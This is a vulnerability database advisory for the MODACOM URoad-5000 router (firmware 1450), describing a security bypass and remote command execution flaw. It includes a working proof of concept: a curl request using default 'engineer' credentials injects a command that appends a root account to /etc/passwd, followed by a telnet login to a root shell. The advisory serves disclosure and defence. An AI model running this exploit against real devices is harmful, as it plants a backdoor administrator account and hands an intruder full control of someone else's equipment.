ID
VAR-E-201106-0430
TITLE
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
Trust: 0.3
DESCRIPTION
MODACOM URoad-5000 is prone to a security-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to bypass certain security restrictions and execute arbitrary commands on the affected device.
MODACOM URoad-5000 firmware version 1450 is vulnerable; other versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | modacom | model: | uroad-5000 | scope: | eq | version: | 1450 | Trust: 0.3 |
EXPLOIT
Attackers may exploit these issues by using readily available network utilities.
The following proof of concept is available:
$curl --basic -u "engineer:engineer" -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet www.example.com
Trying www.example.com.
Connected to www.example.com
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
Alex Stanev
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 48089 | Trust: 0.3 |
REFERENCES
| url: | http://www.modacom.co.kr | Trust: 0.3 |
SOURCES
| db: | BID | id: | 48089 |
LAST UPDATE DATE
2022-07-27T09:40:45.481000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 48089 | date: | 2011-06-02T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 48089 | date: | 2011-06-02T00:00:00 |